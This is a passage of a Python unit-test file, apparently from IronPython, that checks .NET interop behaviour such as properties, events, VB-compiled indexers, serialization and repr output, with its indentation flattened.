x = test.GetDefaultProperty(a)
self.assertEqual(x, None)
x = test.GetEditor(a, object)
self.assertEqual(x, None)
x = test.GetEvents(a)
self.assertEqual(x.Count, 0)
x = test.GetEvents(a, None)
self.assertEqual(x.Count, 0)
x = test.GetProperties(a)
self.assertTrue(x.Count == 0)
# Ensure GetProperties checks the attribute dictionary
a = foo()
a.abc = 42
x = test.GetProperties(a)
for prop in x:
if prop.Name == 'abc':
break
else:
self.fail("Unreachable code reached")
def test_char(self):
for x in range(256):
c = System.Char.Parse(chr(x))
self.assertEqual(c, chr(x))
self.assertEqual(chr(x), c)
if c == chr(x): pass
else: self.assertTrue(False)
if not c == chr(x): self.assertTrue(False)
if chr(x) == c: pass
else: self.assertTrue(False)
if not chr(x) == c: self.assertTrue(False)
def test_repr(self):
from IronPythonTest import UnaryClass, BaseClass, BaseClassStaticConstructor
if is_netcoreapp:
clr.AddReference('System.Drawing.Primitives')
else:
clr.AddReference('System.Drawing')
from System.Drawing import Point
self.assertEqual(repr(Point(1,2)).startswith('<System.Drawing.Point object'), True)
self.assertEqual(repr(Point(1,2)).endswith('[{X=1,Y=2}]>'),True)
# these 3 classes define the same repr w/ different \r, \r\n, \n versions
a = UnaryClass(3)
b = BaseClass()
c = BaseClassStaticConstructor()
ra = repr(a)
rb = repr(b)
rc = repr(c)
sa = ra.find('HelloWorld')
sb = rb.find('HelloWorld')
sc = rc.find('HelloWorld')
self.assertEqual(ra[sa:sa+13], rb[sb:sb+13])
self.assertEqual(rb[sb:sb+13], rc[sc:sc+13])
self.assertEqual(ra[sa:sa+13], 'HelloWorld...') # \r\n should be removed, replaced with ...
def test_explicit_interfaces(self):
from IronPythonTest import OverrideTestDerivedClass, IOverrideTestInterface
otdc = OverrideTestDerivedClass()
self.assertEqual(otdc.MethodOverridden(), "OverrideTestDerivedClass.MethodOverridden() invoked")
self.assertEqual(IOverrideTestInterface.MethodOverridden(otdc), 'IOverrideTestInterface.MethodOverridden() invoked')
self.assertEqual(IOverrideTestInterface.x.GetValue(otdc), 'IOverrideTestInterface.x invoked')
self.assertEqual(IOverrideTestInterface.y.GetValue(otdc), 'IOverrideTestInterface.y invoked')
IOverrideTestInterface.x.SetValue(otdc, 'abc')
self.assertEqual(OverrideTestDerivedClass.Value, 'abcx')
IOverrideTestInterface.y.SetValue(otdc, 'abc')
self.assertEqual(OverrideTestDerivedClass.Value, 'abcy')
self.assertEqual(otdc.y, 'OverrideTestDerivedClass.y invoked')
self.assertEqual(IOverrideTestInterface.Method(otdc), "IOverrideTestInterface.method() invoked")
self.assertEqual(hasattr(otdc, 'IronPythonTest_IOverrideTestInterface_x'), False)
# we can also do this the ugly way:
self.assertEqual(IOverrideTestInterface.x.__get__(otdc, OverrideTestDerivedClass), 'IOverrideTestInterface.x invoked')
self.assertEqual(IOverrideTestInterface.y.__get__(otdc, OverrideTestDerivedClass), 'IOverrideTestInterface.y invoked')
self.assertEqual(IOverrideTestInterface.__getitem__(otdc, 2), 'abc')
self.assertEqual(IOverrideTestInterface.__getitem__(otdc, 2), 'abc')
self.assertRaises(NotImplementedError, IOverrideTestInterface.__setitem__, otdc, 2, 3)
try:
IOverrideTestInterface.__setitem__(otdc, 2, 3)
except NotImplementedError: pass
else: self.fail("Unreachable code reached")
def test_field_helpers(self):
from IronPythonTest import OverrideTestDerivedClass
otdc = OverrideTestDerivedClass()
OverrideTestDerivedClass.z.SetValue(otdc, 'abc')
self.assertEqual(otdc.z, 'abc')
self.assertEqual(OverrideTestDerivedClass.z.GetValue(otdc), 'abc')
def test_field_descriptor(self):
from IronPythonTest import MySize
self.assertEqual(MySize.width.__get__(MySize()), 0)
self.assertEqual(MySize.width.__get__(MySize(), MySize), 0)
def test_field_const_write(self):
from IronPythonTest import MySize, ClassWithLiteral
try:
MySize.MaxSize = 23
except AttributeError as e:
self.assertTrue(str(e).find('MaxSize') != -1)
self.assertTrue(str(e).find('MySize') != -1)
try:
ClassWithLiteral.Literal = 23
except AttributeError as e:
self.assertTrue(str(e).find('Literal') != -1)
self.assertTrue(str(e).find('ClassWithLiteral') != -1)
try:
ClassWithLiteral.__dict__['Literal'].__set__(None, 23)
except AttributeError as e:
self.assertTrue(str(e).find('int') != -1)
try:
ClassWithLiteral.__dict__['Literal'].__set__(ClassWithLiteral(), 23)
except AttributeError as e:
self.assertTrue(str(e).find('int') != -1)
try:
MySize().MaxSize = 23
except AttributeError as e:
self.assertTrue(str(e).find('MaxSize') != -1)
self.assertTrue(str(e).find('MySize') != -1)
try:
ClassWithLiteral().Literal = 23
except AttributeError as e:
self.assertTrue(str(e).find('Literal') != -1)
self.assertTrue(str(e).find('ClassWithLiteral') != -1)
def test_field_const_access(self):
from IronPythonTest import MySize, ClassWithLiteral
self.assertEqual(MySize().MaxSize, System.Int32.MaxValue)
self.assertEqual(MySize.MaxSize, System.Int32.MaxValue)
self.assertEqual(ClassWithLiteral.Literal, 5)
self.assertEqual(ClassWithLiteral().Literal, 5)
def test_array(self):
arr = System.Array[int]([0])
self.assertEqual(repr(arr), str(arr))
self.assertEqual(repr(System.Array[int]([0, 1])), 'Array[int]((0, 1))')
def test_strange_inheritance(self):
"""verify that overriding strange methods (such as those that take caller context) doesn't
flow caller context through"""
from IronPythonTest import StrangeOverrides
s = self
class m(StrangeOverrides):
def SomeMethodWithContext(self, arg):
s.assertEqual(arg, 'abc')
def ParamsMethodWithContext(self, *arg):
s.assertEqual(arg, ('abc', 'def'))
def ParamsIntMethodWithContext(self, *arg):
s.assertEqual(arg, (2,3))
a = m()
a.CallWithContext('abc')
a.CallParamsWithContext('abc', 'def')
a.CallIntParamsWithContext(2, 3)
def test_nondefault_indexers(self):
if not self.has_vbc(): return
import os
import _random
r = _random.Random()
r.seed()
fname = 'vbproptest1_%id.vb' % os.getpid()
self.write_to_file(fname, """
Public Class VbPropertyTest
private Indexes(23) as Integer
private IndexesTwo(23,23) as Integer
private shared SharedIndexes(5,5) as Integer
Public Property IndexOne(ByVal index as Integer) As Integer
Get
return Indexes(index)
End Get
Set
Indexes(index) = Value
End Set
End Property
Public Property IndexTwo(ByVal index as Integer, ByVal index2 as Integer) As Integer
Get
return IndexesTwo(index, index2)
End Get
Set
IndexesTwo(index, index2) = Value
End Set
End Property
Public Shared Property SharedIndex(ByVal index as Integer, ByVal index2 as Integer) As Integer
Get
return SharedIndexes(index, index2)
End Get
Set
SharedIndexes(index, index2) = Value
End Set
End Property
End Class""")
try:
name = os.path.join(self.temporary_dir, 'vbproptest%f.dll' % (r.random()))
x = self.run_vbc('/target:library %s "/out:%s"' % (fname, name))
self.assertEqual(x, 0)
clr.AddReferenceToFileAndPath(name)
import VbPropertyTest
x = VbPropertyTest()
self.assertEqual(x.IndexOne[0], 0)
x.IndexOne[1] = 23
self.assertEqual(x.IndexOne[1], 23)
self.assertEqual(x.IndexTwo[0,0], 0)
x.IndexTwo[1,2] = 5
self.assertEqual(x.IndexTwo[1,2], 5)
self.assertEqual(VbPropertyTest.SharedIndex[0,0], 0)
VbPropertyTest.SharedIndex[3,4] = 42
self.assertEqual(VbPropertyTest.SharedIndex[3,4], 42)
finally:
os.unlink(fname)
def test_nondefault_indexers_overloaded(self):
if not self.has_vbc(): return
import os
import _random
r = _random.Random()
r.seed()
fname = 'vbproptest1_%d.vb' % os.getpid()
self.write_to_file(fname, """
Public Class VbPropertyTest
private Indexes(23) as Integer
private IndexesTwo(23,23) as Integer
private shared SharedIndexes(5,5) as Integer
Public Property IndexOne(ByVal index as Integer) As Integer
Get
return Indexes(index)
End Get
Set
Indexes(index) = Value
End Set
End Property
Public Property IndexTwo(ByVal index as Integer, ByVal index2 as Integer) As Integer
Get
return IndexesTwo(index, index2)
End Get
Set
IndexesTwo(index, index2) = Value
End Set
End Property
Public Shared Property SharedIndex(ByVal index as Integer, ByVal index2 as Integer) As Integer
Get
return SharedIndexes(index, index2)
End Get
Set
SharedIndexes(index, index2) = Value
End Set
End Property
End Class
Public Class VbPropertyTest2
Public ReadOnly Property Prop() As string
get
return "test"
end get
end property
Public ReadOnly Property Prop(ByVal name As String) As string
get
return name
end get
end property
End Class""")
try:
name = os.path.join(self.temporary_dir, 'vbproptest%f.dll' % (r.random()))
self.assertEqual(self.run_vbc('/target:library %s /out:"%s"' % (fname, name)), 0)
clr.AddReferenceToFileAndPath(name)
import VbPropertyTest, VbPropertyTest2
x = VbPropertyTest()
self.assertEqual(x.IndexOne[0], 0)
x.IndexOne[1] = 23
self.assertEqual(x.IndexOne[1], 23)
self.assertEqual(x.IndexTwo[0,0], 0)
x.IndexTwo[1,2] = 5
self.assertEqual(x.IndexTwo[1,2], 5)
self.assertEqual(VbPropertyTest.SharedIndex[0,0], 0)
VbPropertyTest.SharedIndex[3,4] = 42
self.assertEqual(VbPropertyTest.SharedIndex[3,4], 42)
self.assertEqual(VbPropertyTest2().Prop, 'test')
self.assertEqual(VbPropertyTest2().get_Prop('foo'), 'foo')
finally:
os.unlink(fname)
def test_interface_abstract_events(self):
from IronPythonTest import IEventInterface, AbstractEvent, SimpleDelegate, UseEvent
s = self
# inherit from an interface or abstract event, and define the event
for baseType in [IEventInterface, AbstractEvent]:
class foo(baseType):
def __init__(self):
self._events = []
def add_MyEvent(self, value):
s.assertIsInstance(value, SimpleDelegate)
self._events.append(value)
def remove_MyEvent(self, value):
s.assertIsInstance(value, SimpleDelegate)
self._events.remove(value)
def MyRaise(self):
for x in self._events: x()
global called
called = False
def bar(*args):
global called
called = True
a = foo()
a.MyEvent += bar
a.MyRaise()
self.assertEqual(called, True)
a.MyEvent -= bar
called = False
a.MyRaise()
self.assertEqual(called, False)
# hook the event from the CLI side, and make sure that raising
# it causes the CLI side to see the event being fired.
UseEvent.Hook(a)
a.MyRaise()
self.assertEqual(UseEvent.Called, True)
UseEvent.Called = False
UseEvent.Unhook(a)
a.MyRaise()
self.assertEqual(UseEvent.Called, False)
@unittest.skipIf(is_debug, "assertion failure")
def test_dynamic_assembly_ref(self):
# verify we can add a reference to a dynamic assembly, and
# then create an instance of that type
class foo(object): pass
clr.AddReference(foo().GetType().Assembly)
import IronPython.NewTypes.System
for x in dir(IronPython.NewTypes.System):
if x.startswith('Object_'):
t = getattr(IronPython.NewTypes.System, x)
x = t(foo)
break
else:
# we should have found our type
self.fail('No type found!')
def test_nonzero(self):
from System import Single, Byte, SByte, Int16, UInt16, Int64, UInt64
for t in [Single, Byte, SByte, Int16, UInt16, Int64, UInt64]:
self.assertTrue(hasattr(t, '__bool__'))
if t(0): self.fail("Unreachable code reached")
if not t(1): self.fail("Unreachable code reached")
def test_virtual_event(self):
from IronPythonTest import VirtualEvent, OverrideVirtualEvent, SimpleDelegate, UseEvent
s = self
# inherit from a class w/ a virtual event and a
# virtual event that's been overridden. Check both
# overriding it and not overriding it.
for baseType in [VirtualEvent, OverrideVirtualEvent]:
for override in [True, False]:
class foo(baseType):
def __init__(self):
self._events = []
if override:
def add_MyEvent(self, value):
s.assertIsInstance(value, SimpleDelegate)
self._events.append(value)
def remove_MyEvent(self, value):
s.assertIsInstance(value, SimpleDelegate)
self._events.remove(value)
def add_MyCustomEvent(self, value): pass
def remove_MyCustomEvent(self, value): pass
def MyRaise(self):
for x in self._events: x()
else:
def MyRaise(self):
self.FireEvent()
# normal event
global called
called = False
def bar(*args):
global called
called = True
a = foo()
a.MyEvent += bar
a.MyRaise()
self.assertTrue(called)
a.MyEvent -= bar
called = False
a.MyRaise()
self.assertFalse(called)
# custom event
a.LastCall = None
a = foo()
a.MyCustomEvent += bar
if override: self.assertEqual(a.LastCall, None)
else: self.assertTrue(a.LastCall.endswith('Add'))
a.Lastcall = None
a.MyCustomEvent -= bar
if override: self.assertEqual(a.LastCall, None)
else: self.assertTrue(a.LastCall.endswith('Remove'))
# hook the event from the CLI side, and make sure that raising
# it causes the CLI side to see the event being fired.
UseEvent.Hook(a)
a.MyRaise()
self.assertTrue(UseEvent.Called)
UseEvent.Called = False
UseEvent.Unhook(a)
a.MyRaise()
self.assertFalse(UseEvent.Called)
def test_property_get_set(self):
if is_netcoreapp:
clr.AddReference("System.Drawing.Primitives")
else:
clr.AddReference("System.Drawing")
from System.Drawing import Size
temp = Size()
self.assertEqual(temp.Width, 0)
temp.Width = 5
self.assertEqual(temp.Width, 5)
for i in range(5):
temp.Width = i
self.assertEqual(temp.Width, i)
def test_write_only_property_set(self):
from IronPythonTest import WriteOnly
obj = WriteOnly()
self.assertRaises(AttributeError, getattr, obj, 'Writer')
def test_isinstance_interface(self):
self.assertTrue(isinstance('abc', System.Collections.IEnumerable))
def test_constructor_function(self):
'''
Test to hit IronPython.Runtime.Operations.ConstructionFunctionOps.
'''
self.assertEqual(System.DateTime.__new__.__name__, '__new__')
self.assertTrue(System.DateTime.__new__.__doc__.find('__new__(cls: type, year: Int32, month: Int32, day: Int32)') != -1)
self.assertTrue(System.AssemblyLoadEventArgs.__new__.__doc__.find('__new__(cls: type, loadedAssembly: Assembly)') != -1)
def test_class_property(self):
"""__class__ should work on standard .NET types and should return the type object associated with that class"""
self.assertEqual(System.Environment.Version.__class__, System.Version)
def test_null_str(self):
"""if a .NET type has a bad ToString() implementation that returns null always return String.Empty in Python"""
from IronPythonTest import RudeObjectOverride
self.assertEqual(str(RudeObjectOverride()), '')
self.assertEqual(RudeObjectOverride().__str__(), '')
self.assertEqual(RudeObjectOverride().ToString(), None)
self.assertTrue(repr(RudeObjectOverride()).startswith('<IronPythonTest.RudeObjectOverride object at '))
def test_keyword_construction_readonly(self):
from IronPythonTest import ClassWithLiteral
self.assertRaises(AttributeError, System.Version, 1, 0, Build=100)
self.assertRaises(AttributeError, ClassWithLiteral, Literal=3)
def test_kw_construction_types(self):
if is_netcoreapp:
clr.AddReference("System.IO.FileSystem.Watcher")
for val in [True, False]:
x = System.IO.FileSystemWatcher('.', EnableRaisingEvents = val)
self.assertEqual(x.EnableRaisingEvents, val)
def test_as_bool(self):
"""verify using expressions in if statements works correctly. This generates an
site whose return type is bool so it's important this works for various ways we can
generate the body of the site, and use the site both w/ the initial & generated targets"""
from IronPythonTest import NestedClass
if is_netcoreapp:
clr.AddReference("System.Runtime")
clr.AddReference("System.Threading.Thread")
else:
clr.AddReference('System') # ensure test passes in ipy
# instance property
x = System.Uri('http://foo')
for i in range(2):
if x.AbsolutePath: pass
else: self.fail('instance property')
# instance property on type
for i in range(2):
if System.Uri.AbsolutePath: pass
else: self.fail('instance property on type')
# static property
for i in range(2):
if System.Threading.Thread.CurrentThread: pass
else: self.fail('static property')
# static field
for i in range(2):
if System.String.Empty: self.fail('static field')
# instance field
x = NestedClass()
for i in range(2):
if x.Field: self.fail('instance field')
# instance field on type
for i in range(2):
if NestedClass.Field: pass
else: self.fail('instance field on type')
# math
for i in range(2):
if System.Int64(1) + System.Int64(1): pass
else: self.fail('math')
for i in range(2):
if System.Int64(1) + System.Int64(1): pass
else: self.fail('math')
# GetItem
x = System.Collections.Generic.List[str]()
x.Add('abc')
for i in range(2):
if x[0]: pass
else: self.fail('GetItem')
def test_generic_getitem(self):
if is_netcoreapp:
clr.AddReference("System.Collections")
# calling __getitem__ is the same as indexing
self.assertEqual(System.Collections.Generic.Stack.__getitem__(int), System.Collections.Generic.Stack[int])
# but __getitem__ on a type takes precedence
self.assertRaises(TypeError, System.Collections.Generic.List.__getitem__, int)
x = System.Collections.Generic.List[int]()
x.Add(0)
self.assertEqual(System.Collections.Generic.List[int].__getitem__(x, 0), 0)
# but we can call type.__getitem__ with the instance
self.assertEqual(type.__getitem__(System.Collections.Generic.List, int), System.Collections.Generic.List[int])
@unittest.skipIf(is_netcoreapp, 'no System.Windows.Forms')
def test_multiple_inheritance(self):
"""multiple inheritance from two types in the same hierarchy should work, this is similar to class foo(int, object)"""
clr.AddReference("System.Windows.Forms")
class foo(System.Windows.Forms.Form, System.Windows.Forms.Control): pass
def test_struct_no_ctor_kw_args(self):
from IronPythonTest import Structure
for x in range(2):
s = Structure(a=3)
self.assertEqual(s.a, 3)
def test_nullable_new(self):
from System import Nullable
self.assertEqual(clr.GetClrType(Nullable[()]).IsGenericType, False)
def test_ctor_keyword_args_newslot(self):
"""ctor keyword arg assignment contruction w/ new slot properties"""
from IronPythonTest import BinderTest
x = BinderTest.KeywordDerived(SomeProperty = 'abc')
self.assertEqual(x.SomeProperty, 'abc')
x = BinderTest.KeywordDerived(SomeField = 'abc')
self.assertEqual(x.SomeField, 'abc')
def test_enum_truth(self):
# zero enums are false, non-zero enums are true
StringSplitOptionsNone = getattr(System.StringSplitOptions, "None")
self.assertTrue(not StringSplitOptionsNone)
self.assertTrue(System.StringSplitOptions.RemoveEmptyEntries)
self.assertEqual(StringSplitOptionsNone.__bool__(), False)
self.assertEqual(System.StringSplitOptions.RemoveEmptyEntries.__bool__(), True)
def test_enum_repr(self):
clr.AddReference('IronPython')
from IronPython.Runtime import ModuleOptions
self.assertEqual(repr(ModuleOptions.ShowClsMethods), 'IronPython.Runtime.ModuleOptions.ShowClsMethods')
self.assertEqual(repr(ModuleOptions.ShowClsMethods | ModuleOptions.Optimized),
'<enum IronPython.Runtime.ModuleOptions: ShowClsMethods, Optimized>')
def test_bad_inheritance(self):
"""verify a bad inheritance reports the type name you're inheriting from"""
def f():
class x(System.Single): pass
def g():
class x(System.Version): pass
self.assertRaisesPartialMessage(TypeError, 'System.Single', f)
self.assertRaisesPartialMessage(TypeError, 'System.Version', g)
@unittest.skipIf(is_netcoreapp21, "TODO: figure out")
def test_disposable(self):
"""classes implementing IDisposable should automatically support the with statement"""
from IronPythonTest import DisposableTest
x = DisposableTest()
with x:
pass
self.assertEqual(x.Called, True)
self.assertTrue(hasattr(x, '__enter__'))
self.assertTrue(hasattr(x, '__exit__'))
x = DisposableTest()
x.__enter__()
try:
pass
finally:
self.assertEqual(x.__exit__(None, None, None), None)
self.assertEqual(x.Called, True)
self.assertTrue('__enter__' in dir(x))
self.assertTrue('__exit__' in dir(x))
self.assertTrue('__enter__' in dir(DisposableTest))
self.assertTrue('__exit__' in dir(DisposableTest))
def test_dbnull(self):
"""DBNull should not be true"""
if System.DBNull.Value:
self.fail('System.DBNull.Value should not be true')
def test_special_repr(self):
import System
list = System.Collections.Generic.List[object]()
self.assertEqual(repr(list), 'List[object]()')
list.Add('abc')
self.assertEqual(repr(list), "List[object](['abc'])")
list.Add(2)
self.assertEqual(repr(list), "List[object](['abc', 2])")
list.Add(list)
self.assertEqual(repr(list), "List[object](['abc', 2, [...]])")
dict = System.Collections.Generic.Dictionary[object, object]()
self.assertEqual(repr(dict), "Dictionary[object, object]()")
dict["abc"] = "def"
self.assertEqual(repr(dict), "Dictionary[object, object]({'abc' : 'def'})")
dict["two"] = "def"
self.assertTrue(repr(dict) == "Dictionary[object, object]({'abc' : 'def', 'two' : 'def'})" or
repr(dict) == "Dictionary[object, object]({'two' : 'def', 'def' : 'def'})")
dict = System.Collections.Generic.Dictionary[object, object]()
dict['abc'] = dict
self.assertEqual(repr(dict), "Dictionary[object, object]({'abc' : {...}})")
dict = System.Collections.Generic.Dictionary[object, object]()
dict[dict] = 'abc'
self.assertEqual(repr(dict), "Dictionary[object, object]({{...} : 'abc'})")
def test_issubclass(self):
self.assertTrue(issubclass(int, clr.GetClrType(int)))
def test_explicit_interface_impl(self):
from IronPythonTest import ExplicitTestNoConflict, ExplicitTestOneConflict
noConflict = ExplicitTestNoConflict()
oneConflict = ExplicitTestOneConflict()
self.assertEqual(noConflict.A(), "A")
self.assertEqual(noConflict.B(), "B")
self.assertTrue(hasattr(noConflict, "A"))
self.assertTrue(hasattr(noConflict, "B"))
self.assertRaises(AttributeError, lambda : oneConflict.A())
self.assertEqual(oneConflict.B(), "B")
self.assertTrue(not hasattr(oneConflict, "A"))
self.assertTrue(hasattr(oneConflict, "B"))
def test_interface_isinstance(self):
l = System.Collections.ArrayList()
self.assertEqual(isinstance(l, System.Collections.IList), True)
def test_serialization(self):
"""
TODO:
- this should become a test module in and of itself
- way more to test here..
"""
import pickle
# test the primitive data types...
data = [1, 1.0, 2j, 2, System.Int64(1), System.UInt64(1),
System.UInt32(1), System.Int16(1), System.UInt16(1),
System.Byte(1), System.SByte(1), System.Decimal(1),
System.Char.MaxValue, System.DBNull.Value, System.Single(1.0),
System.DateTime.Now, None, {}, (), [], {'a': 2}, (42, ), [42, ],
System.StringSplitOptions.RemoveEmptyEntries,
]
data.append(list(data)) # list of all the data..
data.append(tuple(data)) # tuple of all the data...
class X:
def __init__(self):
self.abc = 3
class Y(object):
def __init__(self):
self.abc = 3
# instance dictionaries...
data.append(X().__dict__)
data.append(Y().__dict__)
# recursive list
l = []
l.append(l)
data.append(l)
# dict of all the data
d = {}
cnt = 100
for x in data:
d[cnt] = x
cnt += 1
data.append(d)
# recursive dict...
d1 = {}
d2 = {}
d1['abc'] = d2
d1['foo'] = 'baz'
d2['abc'] = d1
data.append(d1)
data.append(d2)
for value in data:
# use cPickle & clr.Serialize/Deserialize directly
for newVal in (pickle.loads(pickle.dumps(value)), clr.Deserialize(*clr.Serialize(value))):
self.assertEqual(type(newVal), type(value))
try:
self.assertEqual(newVal, value)
except RuntimeError as e:
# we hit one of our recursive structures...
self.assertEqual(str(e), "maximum recursion depth exceeded")
self.assertTrue(type(newVal) is list or type(newVal) is dict)
# passing an unknown format raises...
self.assertRaises(ValueError, clr.Deserialize, "unknown", "foo")
al = System.Collections.ArrayList()
al.Add(2)
gl = System.Collections.Generic.List[int]()
gl.Add(2)
# lists...
for value in (al, gl):
for newX in (pickle.loads(pickle.dumps(value)), clr.Deserialize(*clr.Serialize(value))):
self.assertEqual(value.Count, newX.Count)
for i in range(value.Count):
self.assertEqual(value[i], newX[i])
ht = System.Collections.Hashtable()
ht['foo'] = 'bar'
gd = System.Collections.Generic.Dictionary[str, str]()
gd['foo'] = 'bar'
# dictionaries
for value in (ht, gd):
for newX in (pickle.loads(pickle.dumps(value)), clr.Deserialize(*clr.Serialize(value))):
self.assertEqual(value.Count, newX.Count)
for key in value.Keys:
self.assertEqual(value[key], newX[key])
# interesting cases
for tempX in [System.Exception("some message")]:
for newX in (pickle.loads(pickle.dumps(tempX)), clr.Deserialize(*clr.Serialize(tempX))):
self.assertEqual(newX.Message, tempX.Message)
try:
exec(" print 1")
except Exception as err:
tempX = err
newX = pickle.loads(pickle.dumps(tempX))
for attr in ['args', 'filename', 'text', 'lineno', 'msg', 'offset', 'print_file_and_line']:
self.assertEqual(eval("newX.%s" % attr),
eval("tempX.%s" % attr))
class K(System.Exception):
other = "something else"
tempX = K()
#CodePlex 16415
#for newX in (cPickle.loads(cPickle.dumps(tempX)), clr.Deserialize(*clr.Serialize(tempX))):
# self.assertEqual(newX.Message, tempX.Message)
# self.assertEqual(newX.other, tempX.other)
#CodePlex 16415
tempX = System.Exception
#for newX in (cPickle.loads(cPickle.dumps(System.Exception)), clr.Deserialize(*clr.Serialize(System.Exception))):
# temp_except = newX("another message")
# self.assertEqual(temp_except.Message, "another message")
def test_generic_method_error(self):
if is_netcoreapp:
clr.AddReference("System.Linq.Queryable")
else:
clr.AddReference('System.Core')
from System.Linq import Queryable
self.assertRaisesMessage(TypeError, "The type arguments for method 'First' cannot be inferred from the usage. Try specifying the type arguments explicitly.", Queryable.First, [])
def test_collection_length(self):
from IronPythonTest import GenericCollection
a = GenericCollection()
self.assertEqual(len(a), 0)
a.Add(1)
self.assertEqual(len(a), 1)
self.assertTrue(hasattr(a, '__len__'))
def test_dict_copy(self):
self.assertTrue('MaxValue' in System.Int32.__dict__.copy())
def test_decimal_bool(self):
self.assertEqual(bool(System.Decimal(0)), False)
self.assertEqual(bool(System.Decimal(1)), True)
def test_add_str_char(self):
self.assertEqual('bc' + System.Char.Parse('a'), 'bca')
self.assertEqual(System.Char.Parse('a') + 'bc', 'abc')
def test_import_star_enum(self):
d = {}
exec("from System.AttributeTargets import *", d, d)
self.assertTrue('ReturnValue' in d)
def test_cp11971(self):
import os
old_syspath = [x for x in sys.path]
try:
sys.path.append(self.temporary_dir)
#Module using System
self.write_to_file(os.path.join(self.temporary_dir, "cp11971_module.py"),
"""def a():
from System import Array
return Array.CreateInstance(int, 2, 2)""")
#Module which doesn't use System directly
self.write_to_file(os.path.join(self.temporary_dir, "cp11971_caller.py"),
"""import cp11971_module
A = cp11971_module.a()
if not hasattr(A, 'Rank'):
raise 'CodePlex 11971'
""")
#Validations
import cp11971_caller
self.assertTrue(hasattr(cp11971_caller.A, 'Rank'))
self.assertTrue(hasattr(cp11971_caller.cp11971_module.a(), 'Rank'))
finally:
sys.path = old_syspath
def test_ienumerable__getiter__(self):
#--empty list
called = 0
x = System.Collections.Generic.List[int]()
self.assertTrue(hasattr(x, "__iter__"))
for stuff in x:
called +=1
self.assertEqual(called, 0)
#--add one element to the list
called = 0
x.Add(1)
for stuff in x:
self.assertEqual(stuff, 1)
called +=1
self.assertEqual(called, 1)
#--one element list before __iter__ is called
called = 0
x = System.Collections.Generic.List[int]()
x.Add(1)
for stuff in x:
self.assertEqual(stuff, 1)
called +=1
self.assertEqual(called, 1)
#--two elements in the list
called = 0
x.Add(2)
for stuff in x:
self.assertEqual(stuff-1, called)
called +=1
self.assertEqual(called, 2)
def test_overload_functions(self):
for x in min.Overloads.Functions:
self.assertTrue(x.__doc__.startswith('min('))
self.assertTrue(x.__doc__.find('CodeContext') == -1)
# multiple accesses should return the same object
self.assertEqual(
id(min.Overloads[object, object]),
id(min.Overloads[object, object])
)
def test_clr_dir(self):
self.assertTrue('IndexOf' not in clr.Dir('abc'))
self.assertTrue('IndexOf' in clr.DirClr('abc'))
def test_array_contains(self):
if is_mono: # for whatever reason this is defined on Mono
System.Array[str].__dict__['__contains__']
else:
self.assertRaises(KeyError, lambda : System.Array[str].__dict__['__contains__'])
def test_a_override_patching(self):
from IronPythonTest import TestHelpers
if is_netcoreapp:
clr.AddReference("System.Dynamic.Runtime")
clr.AddReference("System.Linq.Expressions")
else:
clr.AddReference("System.Core")
# derive from object
class x(object):
pass
# force creation of GetHashCode built-in function
TestHelpers.HashObject(x())
# derive from a type which overrides GetHashCode
from System.Dynamic import InvokeBinder
from System.Dynamic import CallInfo
class y(InvokeBinder):
def GetHashCode(self): return super(InvokeBinder, self).GetHashCode()
# now the super call should work & should include the InvokeBinder new type
TestHelpers.HashObject(y(CallInfo(0)))
def test_inherited_interface_impl(self):
from IronPythonTest import BinderTest
BinderTest.InterfaceTestHelper.Flag = False
BinderTest.InterfaceTestHelper.GetObject().M()
self.assertEqual(BinderTest.InterfaceTestHelper.Flag, True)
BinderTest.InterfaceTestHelper.Flag = False
BinderTest.InterfaceTestHelper.GetObject2().M()
self.assertEqual(BinderTest.InterfaceTestHelper.Flag, True)
def test_dir(self):
# make sure you can do dir on everything in System which
# includes special types like ArgIterator and Func
for attr in dir(System):
dir(getattr(System, attr))
if is_netcoreapp:
clr.AddReference("System.Collections")
for x in [System.Collections.Generic.SortedList,
System.Collections.Generic.Dictionary,
]:
temp = dir(x)
def test_family_or_assembly(self):
from IronPythonTest import FamilyOrAssembly
class my(FamilyOrAssembly): pass
obj = my()
self.assertEqual(obj.Method(), 42)
obj.Property = 'abc'
self.assertEqual(obj.Property, 'abc')
def test_valuetype_iter(self):
from System.Collections.Generic import Dictionary
d = Dictionary[str, str]()
d["a"] = "foo"
d["b"] = "bar"
it = iter(d)
self.assertEqual(it.__next__().Key, 'a')
self.assertEqual(it.__next__().Key, 'b')
@unittest.skipIf(is_mono, "Causes an abort on mono, needs debug")
def test_abstract_class_no_interface_implself(self):
# this can't be defined in C# or VB, it's a class which is
# abstract and therefore doesn't implement the interface method
ilcode = """
// Microsoft (R) .NET Framework IL Disassembler. Version 3.5.30729.1
// Copyright (c) Microsoft Corporation. All rights reserved.
// Metadata version: v2.0.50727
.assembly extern mscorlib
{
.publickeytoken = (B7 7A 5C 56 19 34 E0 89 ) // .z\V.4..
.ver 2:0:0:0
}
.assembly test
{
.custom instance void [mscorlib]System.Runtime.CompilerServices.CompilationRelaxationsAttribute::.ctor(int32) = ( 01 00 08 00 00 00 00 00 )
.custom instance void [mscorlib]System.Runtime.CompilerServices.RuntimeCompatibilityAttribute::.ctor() = ( 01 00 01 00 54 02 16 57 72 61 70 4E 6F 6E 45 78 // ....T..WrapNonEx
63 65 70 74 69 6F 6E 54 68 72 6F 77 73 01 ) // ceptionThrows.
.hash algorithm 0x00008004
.ver 0:0:0:0
}
.module test.dll
// MVID: {EFFA8498-8C81-4168-A911-C25D4A2C633A}
.imagebase 0x00400000
.file alignment 0x00000200
.stackreserve 0x00100000
.subsystem 0x0003 // WINDOWS_CUI
.corflags 0x00000001 // ILONLY
// Image base: 0x00500000
// =============== CLASS MEMBERS DECLARATION ===================
.class interface public abstract auto ansi IFoo
{
.method public hidebysig newslot abstract virtual
instance string Baz() cil managed
{
} // end of method IFoo::Baz
} // end of class IFoo
.class public abstract auto ansi beforefieldinit AbstractILTest
extends [mscorlib]System.Object
implements IFoo
{
.method public hidebysig static string
Helper(class IFoo x) cil managed
{
// Code size 12 (0xc)
.maxstack 1
.locals init (string V_0)
IL_0000: nop
IL_0001: ldarg.0
IL_0002: callvirt instance string IFoo::Baz()
IL_0007: stloc.0
IL_0008: br.s IL_000a
IL_000a: ldloc.0
IL_000b: ret
} // end of method foo::Helper
.method family hidebysig specialname rtspecialname
instance void .ctor() cil managed
{
// Code size 7 (0x7)
.maxstack 8
IL_0000: ldarg.0
IL_0001: call instance void [mscorlib]System.Object::.ctor()
IL_0006: ret
} // end of method foo::.ctor
} // end of class foo
"""
import os
testilcode = os.path.join(self.temporary_dir, 'testilcode_%d.il' % os.getpid())
self.write_to_file(testilcode, ilcode)
try:
self.run_ilasm("/dll " + testilcode)
